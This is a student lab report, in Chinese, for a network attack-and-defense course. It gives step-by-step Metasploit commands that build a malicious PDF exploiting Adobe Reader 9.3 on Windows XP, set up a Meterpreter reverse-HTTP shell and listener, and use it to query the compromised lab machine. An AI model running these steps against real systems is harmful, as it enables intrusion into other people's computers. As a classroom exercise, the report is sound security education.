20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

实验内容

• 初步掌握平台matesploit的使用

• 有了初步完成渗透操作的思路

• 本次攻击对象为：windows xp sp3 / Adobe 9.3

• 主机为kali的ip地址为：192.168.199.220、靶机windows xp 的ip地址为：192.168.199.137

实验步骤

• 使用命令msfconsole进入控制台

• 根据自己的需求选择攻击模块，将其载入（这里选用windows/fileformat/adobe_cooltype_sing），可以使用info命令查看模块的基本信息，以及参数要求，使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

  设置攻击载荷payloads ，命令为set payloads windows/meterpreter/reverse_http

  之后使用命令show options来确定需要修改的参数（截图省略）

  需要设置的参数有LHOST、LPORT、FILENAME

  命令为

    	set LHOST 192.168.199.220
  
    	set LPORT 5335
  
    	set FILENAME 5335.pdf
  

• 使用命令exploit生成5335.pdf

• 注意其生成路径，是一个隐藏文件夹，此时可以打开一个新的cmd，使用名命令cp 5335.pdf /root/5335.pdf将其移动出来

• 之后退出并从新进入msf平台，使用命令msfconsole

• 使用命令 use exploit/multi/handler进入监听模式，并设置好参数，确认无误后，执行exploit等待被攻击者的接听。

• 连接成功，使用命令sysinfo可以轻而易举的获得靶机的信息

也可以使用ipconfig查看靶机信息

实验中遇到的问题

• 起初在kali中生成了5335.pdf后不知道如何将其传输到靶机中（后来采用ncat传过去的），其中采用过qq邮箱进行传输，但是遇到了一下问题

  

  后来完成实验我在想，既然邮件能被查杀出来，难道不就说明腾讯能查看到我们的信息，有时候是个好事，利用云查杀解决一些不必要的烦恼，但是如果邮件中含有一些个人隐私信息呢，这是好事还是坏事。